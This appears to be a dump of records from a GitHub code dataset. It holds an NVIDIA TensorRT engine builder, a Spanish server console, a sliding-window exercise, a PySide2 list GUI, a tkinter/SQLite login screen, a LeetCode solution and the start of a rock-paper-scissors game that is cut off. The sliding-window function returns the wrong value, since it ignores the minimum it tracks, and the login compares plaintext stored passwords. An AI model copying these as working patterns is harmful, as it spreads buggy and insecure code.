tensorrt_logger\n\n\ndef _set_excluded_layer_precision(network, fp32_layer_names, fp16_layer_names):\n \"\"\"When generating an INT8 model, it sets excluded layers' precision as fp32 or fp16.\n\n In detail, this function is only used when generating INT8 TensorRT models. It accepts\n two lists of layer names: (1). for the layers in fp32_layer_names, their precision will\n be set as fp32; (2). for those in fp16_layer_names, their precision will be set as fp16.\n\n Args:\n network: TensorRT network object.\n fp32_layer_names (list): List of layer names. These layers use fp32.\n fp16_layer_names (list): List of layer names. These layers use fp16.\n \"\"\"\n is_mixed_precision = False\n use_fp16_mode = False\n\n for i, layer in enumerate(network):\n if any(s in layer.name for s in fp32_layer_names):\n is_mixed_precision = True\n layer.precision = trt.float32\n layer.set_output_type(0, trt.float32)\n logger.info(\"fp32 index: %d; name: %s\", i, layer.name)\n elif any(s in layer.name for s in fp16_layer_names):\n is_mixed_precision = True\n use_fp16_mode = True\n layer.precision = trt.float16\n layer.set_output_type(0, trt.float16)\n logger.info(\"fp16 index: %d; name: %s\", i, layer.name)\n else:\n layer.precision = trt.int8\n layer.set_output_type(0, trt.int8)\n\n return is_mixed_precision, use_fp16_mode\n\n\nclass EngineBuilder(object):\n \"\"\"Create a TensorRT engine.\n\n Args:\n filename (list): List of filenames to load model from.\n max_batch_size (int): Maximum batch size.\n vmax_workspace_size (int): Maximum workspace size.\n dtype (str): data type ('fp32', 'fp16' or 'int8').\n calibrator (:any:`Calibrator`): Calibrator to use for INT8 optimization.\n fp32_layer_names (list): List of layer names. These layers use fp32.\n fp16_layer_names (list): List of layer names. These layers use fp16.\n verbose (bool): Whether to turn on verbose mode.\n tensor_scale_dict (dict): Dictionary mapping names to tensor scaling factors.\n strict_type(bool): Whether or not to apply strict_type_constraints for INT8 mode.\n \"\"\"\n\n def __init__(\n self,\n filenames,\n max_batch_size=DEFAULT_MAX_BATCH_SIZE,\n max_workspace_size=DEFAULT_MAX_WORKSPACE_SIZE,\n dtype=\"fp32\",\n calibrator=None,\n fp32_layer_names=None,\n fp16_layer_names=None,\n verbose=False,\n tensor_scale_dict=None,\n strict_type=False,\n ):\n \"\"\"Initialization routine.\"\"\"\n if dtype == \"int8\":\n self._dtype = trt.DataType.INT8\n elif dtype == \"fp16\":\n self._dtype = trt.DataType.HALF\n elif dtype == \"fp32\":\n self._dtype = trt.DataType.FLOAT\n else:\n raise ValueError(\"Unsupported data type: %s\" % dtype)\n self._strict_type = strict_type\n if fp32_layer_names is None:\n fp32_layer_names = []\n elif dtype != \"int8\":\n raise ValueError(\n \"FP32 layer precision could be set only when dtype is INT8\"\n )\n\n if fp16_layer_names is None:\n fp16_layer_names = []\n elif dtype != \"int8\":\n raise ValueError(\n \"FP16 layer precision could be set only when dtype is INT8\"\n )\n\n self._fp32_layer_names = fp32_layer_names\n self._fp16_layer_names = fp16_layer_names\n\n self._tensorrt_logger = _create_tensorrt_logger(verbose)\n builder = trt.Builder(self._tensorrt_logger)\n config = builder.create_builder_config()\n trt.init_libnvinfer_plugins(self._tensorrt_logger, \"\")\n if self._dtype == trt.DataType.HALF and not builder.platform_has_fast_fp16:\n logger.error(\"Specified FP16 but not supported on platform.\")\n raise AttributeError(\n \"Specified FP16 but not supported on platform.\")\n return\n\n if self._dtype == trt.DataType.INT8 and not builder.platform_has_fast_int8:\n logger.error(\"Specified INT8 but not supported on platform.\")\n raise AttributeError(\n \"Specified INT8 but not supported on platform.\")\n return\n\n if self._dtype == trt.DataType.INT8:\n if tensor_scale_dict is None and calibrator is None:\n logger.error(\"Specified INT8 but neither calibrator \"\n \"nor tensor_scale_dict is provided.\")\n raise AttributeError(\"Specified INT8 but no calibrator \"\n \"or tensor_scale_dict is provided.\")\n\n network = builder.create_network()\n\n self._load_from_files(filenames, network)\n\n builder.max_batch_size = max_batch_size\n config.max_workspace_size = max_workspace_size\n\n if self._dtype == trt.DataType.HALF:\n config.set_flag(trt.BuilderFlag.FP16)\n\n if self._dtype == trt.DataType.INT8:\n config.set_flag(trt.BuilderFlag.INT8)\n if tensor_scale_dict is None:\n config.int8_calibrator = calibrator\n # When use mixed precision, for TensorRT builder:\n # strict_type_constraints needs to be True;\n # fp16_mode needs to be True if any layer uses fp16 precision.\n set_strict_types, set_fp16_mode = \\\n _set_excluded_layer_precision(\n network=network,\n fp32_layer_names=self._fp32_layer_names,\n fp16_layer_names=self._fp16_layer_names,\n )\n if set_strict_types:\n config.set_flag(trt.BuilderFlag.STRICT_TYPES)\n if set_fp16_mode:\n config.set_flag(trt.BuilderFlag.FP16)\n else:\n # Discrete Volta GPUs don't have int8 tensor cores. So TensorRT might\n # not pick int8 implementation over fp16 or even fp32 for V100\n # GPUs found on data centers (e.g., AVDC). This will be a discrepancy\n # compared to Turing GPUs including d-GPU of DDPX and also Xavier i-GPU\n # both of which have int8 accelerators. We set the builder to strict\n # mode to avoid picking higher precision implementation even if they are\n # faster.\n if self._strict_type:\n config.set_flag(trt.BuilderFlag.STRICT_TYPES)\n else:\n config.set_flag(trt.BuilderFlag.FP16)\n self._set_tensor_dynamic_ranges(\n network=network, tensor_scale_dict=tensor_scale_dict\n )\n\n engine = builder.build_engine(network, config)\n\n try:\n assert engine\n except AssertionError:\n logger.error(\"Failed to create engine\")\n _, _, tb = sys.exc_info()\n traceback.print_tb(tb) # Fixed format\n tb_info = traceback.extract_tb(tb)\n _, line, _, text = tb_info[-1]\n raise AssertionError(\n \"Parsing failed on line {} in statement {}\".format(\n line, text)\n )\n\n self._engine = engine\n\n def _load_from_files(self, filenames, network):\n \"\"\"Load an engine from files.\"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def _set_tensor_dynamic_ranges(network, tensor_scale_dict):\n \"\"\"Set the scaling factors obtained from quantization-aware training.\n\n Args:\n network: TensorRT network object.\n tensor_scale_dict (dict): Dictionary mapping names to tensor scaling factors.\n \"\"\"\n tensors_found = []\n for idx in range(network.num_inputs):\n input_tensor = network.get_input(idx)\n if input_tensor.name in tensor_scale_dict:\n tensors_found.append(input_tensor.name)\n cal_scale = tensor_scale_dict[input_tensor.name]\n input_tensor.dynamic_range = (-cal_scale, cal_scale)\n\n for layer in network:\n found_all_outputs = True\n for idx in range(layer.num_outputs):\n output_tensor = layer.get_output(idx)\n if output_tensor.name in tensor_scale_dict:\n tensors_found.append(output_tensor.name)\n cal_scale = tensor_scale_dict[output_tensor.name]\n output_tensor.dynamic_range = (-cal_scale, cal_scale)\n else:\n found_all_outputs = False\n if found_all_outputs:\n layer.precision = trt.int8\n tensors_in_dict = tensor_scale_dict.keys()\n assert set(tensors_in_dict) == set(tensors_found), (\n \"Some of the tensor names specified in tensor \"\n \"scale dictionary was not found in the network.\"\n )\n\n def get_engine(self):\n \"\"\"Return the engine that was built by the instance.\"\"\"\n return self._engine\n\n\nclass UFFEngineBuilder(EngineBuilder):\n \"\"\"Create a TensorRT engine from a UFF file.\n\n Args:\n filename (str): UFF file to create engine from.\n input_node_name (str): Name of the input node.\n input_dims (list): Dimensions of the input tensor.\n output_node_names (list): Names of the output nodes.\n \"\"\"\n\n def __init__(\n self,\n filename,\n input_node_name,\n input_dims,\n output_node_names,\n *args,\n **kwargs\n ):\n \"\"\"Init routine.\"\"\"\n self._input_node_name = input_node_name\n if not isinstance(output_node_names, list):\n output_node_names = [output_node_names]\n self._output_node_names = output_node_names\n self._input_dims = input_dims\n\n super(UFFEngineBuilder, self).__init__([filename], *args, **kwargs)\n\n def _load_from_files(self, filenames, network):\n filename = filenames[0]\n parser = trt.UffParser()\n for key, value in self._input_dims.items():\n parser.register_input(key, value, trt.UffInputOrder(0))\n for name in self._output_node_names:\n parser.register_output(name)\n try:\n assert parser.parse(filename, network, trt.DataType.FLOAT)\n except AssertionError:\n logger.error(\"Failed to parse UFF File\")\n _, _, tb = sys.exc_info()\n traceback.print_tb(tb) # Fixed format\n tb_info = traceback.extract_tb(tb)\n _, line, _, text = tb_info[-1]\n raise AssertionError(\n \"UFF parsing failed on line {} in statement {}\".format(line, text)\n )\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/common/export/trt_utils.py","file_name":"trt_utils.py","file_ext":"py","file_size_in_byte":12144,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22023386358","text":"#consola del servidor (archivo de control)\n#este archivo forma parte de la estructura del servidor\n#este archivo sirve para el manejo del servidor durante la ejecucion\n\nimport sys\nimport os\n\n\n#lista de comandos\n#estos comandos no se ejecutan a la vez que el archivo del servidor\n\nrun = 'python main.py'\nlogs = 'cat logs.txt'\nhelp = 'help'\nclear = 'clear'\nmaintenance = 'python maintenance.py'\n\n \ncommands = ['run', 'logs','help', 'clear', 'maintenance']\n\nprint('Consola del servidor iniciada')\nwhile True:\n command = str(input())\n\n if command == 'run':\n \n print('')\n os.system(run)\n \n elif command == 'logs':\n \n print('')\n os.system(logs)\n \n elif command == 'help':\n \n for i in range(0, len(commands)):\n print('')\n print(commands[i])\n print('')\n \n elif command == 'clear':\n \n print('')\n os.system(clear)\n print('')\n \n elif command == 'maintenance':\n \n print('')\n #maintenance commands\n print('Lista de comandos del sistema de mantenimiento:')\n print('')\n print('-users --> Grafica del numero de usuarios')\n print('')\n \n command = str(input())\n if command == 'users':\n from maintenance import num_users\n else : \n print('Comando no valido') \n \n","repo_name":"Pachec00/Server","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8844199457","text":"\nimport math\ndef find_substring(str, pattern):\n\tunique_pattern_chars = set(pattern)\n\tfrequency_dict = {}\n\twindow_start, min_length, dict_keys, m = 0, math.inf, 0, 0\n\n\tfor window_end in range(len(str)):\n\t\tright_char = str[window_end]\n\n\t\tif right_char in unique_pattern_chars:\n\t\t\tif right_char not in frequency_dict:\n\t\t\t\tfrequency_dict[right_char] = 0\n\t\t\t\tdict_keys += 1\n\n\t\t\tfrequency_dict[right_char] += 1\n\t\t\n\t\twhile dict_keys == len(unique_pattern_chars):\n\t\t\tmin_length = min(min_length, window_end - window_start + 1)\n\n\t\t\tleft_char = str[window_start]\n\t\t\tif left_char in unique_pattern_chars:\n\t\t\t\tfrequency_dict[left_char] -= 1\n\t\t\t\tif frequency_dict[left_char] == 0:\n\t\t\t\t\tdict_keys -= 1\n\t\t\t# else:\n\t\t\twindow_start += 1\n\n\tif min_length != math.inf:\n\t\tm = window_end - window_start + 1\n\t\treturn m\n\telse:\n\t\treturn 0\n\n\ndef main():\n\tprint(find_substring(\"aabdec\", \"abc\"))\n\tprint(find_substring(\"abdabca\", \"abc\"))\n\tprint(find_substring(\"adcad\", \"abc\"))\n\nmain()","repo_name":"Rama189/Grokking-the-Coding-Interview-Patterns","sub_path":"1. Sliding window/Problem Challenge 3 - Smallest Window containing Substring (hard).py","file_name":"Problem Challenge 3 - Smallest Window containing Substring (hard).py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26747047883","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport sys\nfrom PySide2.QtWidgets import (\n QApplication,\n QWidget,\n QPushButton,\n QHBoxLayout,\n QVBoxLayout,\n QListWidget,\n QAbstractItemView,\n)\n\n\nclass MainWindow(QWidget):\n def __init__(self, trp):\n super().__init__()\n self.setWindowTitle(\"Task 1\")\n self.setGeometry(370, 390, 370, 390)\n self.lst1 = QListWidget()\n self.lst1.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.lst2 = QListWidget()\n self.lst2.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.lst1.addItems(trp)\n self.inp1 = QPushButton(\"Add\")\n self.inp2 = QPushButton(\"Remove\")\n self.setting()\n\n def setting(self):\n hbox = QHBoxLayout()\n vbox = QVBoxLayout()\n hbox.addWidget(self.lst1)\n hbox.addLayout(vbox)\n vbox.addWidget(self.inp1)\n vbox.addWidget(self.inp2)\n hbox.addWidget(self.lst2)\n self.setLayout(hbox)\n self.inp1.clicked.connect(self.toright)\n self.inp2.clicked.connect(self.toleft)\n self.inp1.setStyleSheet(\"background: purple\")\n self.inp2.setStyleSheet(\"background: blue\")\n\n def toright(self):\n listItems = self.lst1.selectedItems()\n for item in listItems:\n self.lst1.takeItem(self.lst1.row(item))\n self.lst2.addItem(item)\n\n def toleft(self):\n listItems = self.lst2.selectedItems()\n for item in listItems:\n self.lst2.takeItem(self.lst2.row(item))\n self.lst1.addItem(item)\n\n\ndef main():\n app = QApplication(sys.argv)\n trp = (\n \"Apple\",\n \"Bananas\",\n \"Carrot\",\n \"Butter\",\n \"Meat\",\n \"Potato\",\n \"Pineapple\"\n )\n application = MainWindow(trp)\n application.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Adelaide95/laba4.8-PySide2-","sub_path":"task 1.py","file_name":"task 1.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38816295088","text":"import tkinter\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport tkcalendar\r\nimport sqlite3\r\nfrom tkinter import messagebox\r\nfrom PIL import ImageTk, Image\r\nimport random\r\n\r\n\r\nmaster = Tk()\r\nmaster.title('WELCOME TO GRACIOUS APARTMENTS')\r\nsW = master.winfo_screenwidth()\r\nsH = master.winfo_screenheight()\r\naW = sW - 200\r\naH = sH - 100\r\nposx = (sW/2) - (aW/2)\r\nposy = (sH/2) - (aH/2)\r\nmaster.geometry(f'{aW}x{aH}+{int(posx)}+{int(posy)}')\r\nmaster.configure(background=\"#cfe0e8\")\r\n\r\n\r\n\r\ndef expandBlueG():\r\n lbl_Introg.configure(font=(\"arial\",100,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introg.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introg.after(5000, shrinkNormal)\r\nLfrm_Gracious = LabelFrame(master, relief=\"groove\", bg=\"#ffcc5c\")\r\nLfrm_Gracious.grid(padx=100,pady=50)\r\nlbl_Introg = Label(Lfrm_Gracious, text=\"G\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introg.grid(row=1, column=3)\r\nlbl_Introg.after(3000, expandBlueG)\r\n\r\n\r\n\r\n#lbl_Intror = Label(frm_Intro, text=\"R\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1,column=4)\r\ndef expandBlueR():\r\n lbl_Intror.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intror.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introg.after(5000, shrinkNormal)\r\nlbl_Intror = Label(Lfrm_Gracious, text=\"R\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intror.grid(row=1, column=4)\r\nlbl_Intror.after(4000, expandBlueR)\r\n\r\n#lbl_Introa = Label(frm_Intro, text=\"A\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=5)\r\ndef expandBlueA():\r\n lbl_Introa.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introa.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introa.after(5000, shrinkNormal)\r\nlbl_Introa = Label(Lfrm_Gracious, text=\"A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introa.grid(row=1, column=5)\r\nlbl_Introa.after(5000, expandBlueA)\r\n\r\n#lbl_Introc = Label(frm_Intro, text=\"C\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=6)\r\ndef expandBlueC():\r\n lbl_Introc.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introc.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introc.after(5000, shrinkNormal)\r\nlbl_Introc = Label(Lfrm_Gracious, text=\"C\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introc.grid(row=1, column=6)\r\nlbl_Introc.after(6000, expandBlueC)\r\n\r\n#lbl_Introi = Label(frm_Intro, text=\"I\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=7)\r\ndef expandBlueI():\r\n lbl_Introi.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introi.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introi.after(5000, shrinkNormal)\r\nlbl_Introi = Label(Lfrm_Gracious, text=\"I\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introi.grid(row=1, column=7)\r\nlbl_Introi.after(7000, expandBlueI)\r\n\r\n#lbl_Introo = Label(frm_Intro, text=\"O\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=8)\r\ndef expandBlueO():\r\n lbl_Introo.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introo.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introo.after(5000, shrinkNormal)\r\nlbl_Introo = Label(Lfrm_Gracious, text=\"O\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introo.grid(row=1, column=8)\r\nlbl_Introo.after(8000, expandBlueO)\r\n\r\n#lbl_Introu = Label(frm_Intro, text=\"U\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=9)\r\ndef expandBlueU():\r\n lbl_Introu.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introu.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introu.after(5000, shrinkNormal)\r\nlbl_Introu = Label(Lfrm_Gracious, text=\"U\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introu.grid(row=1, column=9)\r\nlbl_Introu.after(9000, expandBlueU)\r\n\r\n#lbl_Intros = Label(frm_Intro, text=\"S\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=1, column=10)\r\ndef expandBlueS():\r\n lbl_Intros.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intros.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Intros.after(5000, shrinkNormal)\r\nlbl_Intros = Label(Lfrm_Gracious, text=\"S\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intros.grid(row=1, column=10)\r\nlbl_Intros.after(10000, expandBlueS)\r\n#===================================================apartments======================================================\r\n#lbl_Introap = Label(frm_Intro, text=\"A\", font=(\"times\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=2)\r\ndef expandBlueAP():\r\n lbl_Introap.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introap.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introap.after(4000, shrinkNormal)\r\nlbl_Introap = Label(Lfrm_Gracious, text=\" A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introap.grid(row=1, column=11)\r\nlbl_Introap.after(10000, expandBlueAP)\r\n\r\n#lbl_Introp = Label(frm_Intro, text=\"P\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=3)\r\ndef expandBlueP():\r\n lbl_Introp.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introp.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introp.after(4000, shrinkNormal)\r\nlbl_Introp = Label(Lfrm_Gracious, text=\"P\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introp.grid(row=1, column=12)\r\nlbl_Introp.after(9000, expandBlueP)\r\n\r\n#lbl_Introsa = Label(frm_Intro, text=\"A\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=4)\r\ndef expandBlueSA():\r\n lbl_Introsa.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsa.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsa.after(4000, shrinkNormal)\r\nlbl_Introsa = Label(Lfrm_Gracious, text=\"A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsa.grid(row=1, column=13)\r\nlbl_Introsa.after(8000, expandBlueSA)\r\n\r\n#lbl_Introsr = Label(frm_Intro, text=\"R\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=5)\r\ndef expandBlueSR():\r\n lbl_Introsr.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsr.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsr.after(4000, shrinkNormal)\r\nlbl_Introsr = Label(Lfrm_Gracious, text=\"R\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsr.grid(row=1, column=14)\r\nlbl_Introsr.after(7000, expandBlueSR)\r\n\r\n#lbl_Introst = Label(frm_Intro, text=\"T\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=6)\r\ndef expandBlueST():\r\n lbl_Introst.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introst.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introst.after(4000, shrinkNormal)\r\nlbl_Introst = Label(Lfrm_Gracious, text=\"T\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introst.grid(row=1, column=15)\r\nlbl_Introst.after(6000, expandBlueST)\r\n\r\n#lbl_Intros = Label(frm_Intro, text=\"M\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=7)\r\ndef expandBlueM():\r\n lbl_Introm.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introm.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introm.after(4000, shrinkNormal)\r\nlbl_Introm = Label(Lfrm_Gracious, text=\"M\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introm.grid(row=1, column=16)\r\nlbl_Introm.after(5000, expandBlueM)\r\n\r\n#lbl_Introse = Label(frm_Intro, text=\"E\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=8)\r\ndef expandBlueSE():\r\n lbl_Introse.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introse.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introse.after(4000, shrinkNormal)\r\nlbl_Introse = Label(Lfrm_Gracious, text=\"E\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introse.grid(row=1, column=17)\r\nlbl_Introse.after(4000, expandBlueSE)\r\n\r\n#lbl_Introsn = Label(frm_Intro, text=\"N\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=9)\r\ndef expandBlueSN():\r\n lbl_Introsn.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsn.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsn.after(4000, shrinkNormal)\r\nlbl_Introsn = Label(Lfrm_Gracious, text=\"N\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsn.grid(row=1, column=18)\r\nlbl_Introsn.after(3000, expandBlueSN)\r\n\r\n#lbl_Introsx = Label(frm_Intro, text=\"T\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=10)\r\ndef expandBlueSX():\r\n lbl_Introsx.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsx.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsx.after(4000, shrinkNormal)\r\nlbl_Introsx = Label(Lfrm_Gracious, text=\"T\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsx.grid(row=1, column=19)\r\nlbl_Introsx.after(2000, expandBlueSX)\r\n\r\n#lbl_Intross = Label(frm_Intro, text=\"S\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=11)\r\ndef expandBlueSS():\r\n lbl_Intross.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intross.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Intross.after(4000, shrinkNormal)\r\nlbl_Intross = Label(Lfrm_Gracious, text=\"S\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intross.grid(row=1, column=20)\r\nlbl_Intross.after(1000, expandBlueSS)\r\n\r\n\r\n\r\n\r\n\r\nLfrm_Out = LabelFrame(master, text=\"Welcome Grace\",font=(\"arial\",5), relief=\"raised\", borderwidth=5, bg=\"#ffcc5c\",padx=20,pady=20)\r\nLfrm_Out.grid(padx=500, pady=100)\r\nfrm_Mid = Frame(Lfrm_Out, relief=\"raised\", borderwidth=5, bg=\"#cfe0e8\",padx=10,pady=10)\r\nfrm_Mid.grid()\r\nLfrm_In = LabelFrame(frm_Mid, bg=\"#ffcc5c\")\r\nLfrm_In.grid()\r\n\r\nlbl_User = Label(Lfrm_In, text=\"User_Name: \", bg=\"#ffcc5c\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\nlbl_User.grid(row=0, column=0, columnspan=2, padx=10, pady=20)\r\nlbl_Pass = Label(Lfrm_In, text=\"Pass_Word: \", bg=\"#ffcc5c\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\nlbl_Pass.grid(row=1, column=0, columnspan=2, padx=10, pady=20)\r\n\r\nUser_Name = StringVar()\r\netr_User = Entry(Lfrm_In, textvariable=User_Name, bg=\"#cfe0e8\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\netr_User.grid(row=0, column=2, columnspan=2, padx=10, pady=20)\r\nPass_Word = StringVar()\r\netr_Pass = Entry(Lfrm_In, textvariable=Pass_Word, bg=\"#cfe0e8\", fg=\"#622569\", font=(\"times\",20,\"bold\"), show='*')\r\netr_Pass.grid(row=1, column=2, columnspan=2, padx=10, pady=20)\r\n\r\ndef Validate():\r\n if User_Name.get()=='' or Pass_Word.get()=='':\r\n messagebox.showerror('Empty Fields','User Name and Password Must Be Filled')\r\n else:\r\n conn = sqlite3.connect('User_Data')\r\n cur = conn.cursor()\r\n cur.execute(\"SELECT * FROM user\")\r\n a = cur.fetchall()\r\n #print(a)\r\n cur.execute(\"SELECT * FROM user WHERE user_id=? AND password=?\",(User_Name.get(), Pass_Word.get()))\r\n c= cur.fetchall()\r\n if c:\r\n print('Login Successful')\r\n else:\r\n print('Login Failed!!')\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\nbtn_Login = Button(frm_Mid, text=\"Log In\", background=\"#588c7e\", fg=\"#ff6f69\", activebackground=\"#ff6f69\", activeforeground=\"#588c7e\", font=(\"arial\",15,\"bold\"), command=Validate)\r\nbtn_Login.grid(padx=2, pady=4)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmainloop()","repo_name":"TekJoker/Python_Project_Water_BIlls","sub_path":"ProjoZ_002_LogIn.py","file_name":"ProjoZ_002_LogIn.py","file_ext":"py","file_size_in_byte":11632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25198293932","text":"from collections import defaultdict\n\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n\n freq1, freq2 = defaultdict(int), defaultdict(int)\n res = []\n for num in nums1:\n freq1[num] += 1\n for num in nums2:\n freq2[num] += 1\n for num in freq1.keys():\n if num in freq2:\n freq = min(freq1[num], freq2[num])\n for _ in range(freq):\n res.append(num)\n return res\n","repo_name":"Reflectrr/leetcode","sub_path":"350.intersection_of_two_arrays_ii.py","file_name":"350.intersection_of_two_arrays_ii.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36249585854","text":"import random\n\ndef get_choices():\n player_choice = input(\"Enter a choice (rock, paper, scissors): \")\n options = [\"rock\", \"paper\", \"scissors\"]\n computer_choice = random.choice(options)\n choices = {\"player\": player_choice, \"computer\": computer_choice}\n return choices\n\ndef check_win(player, 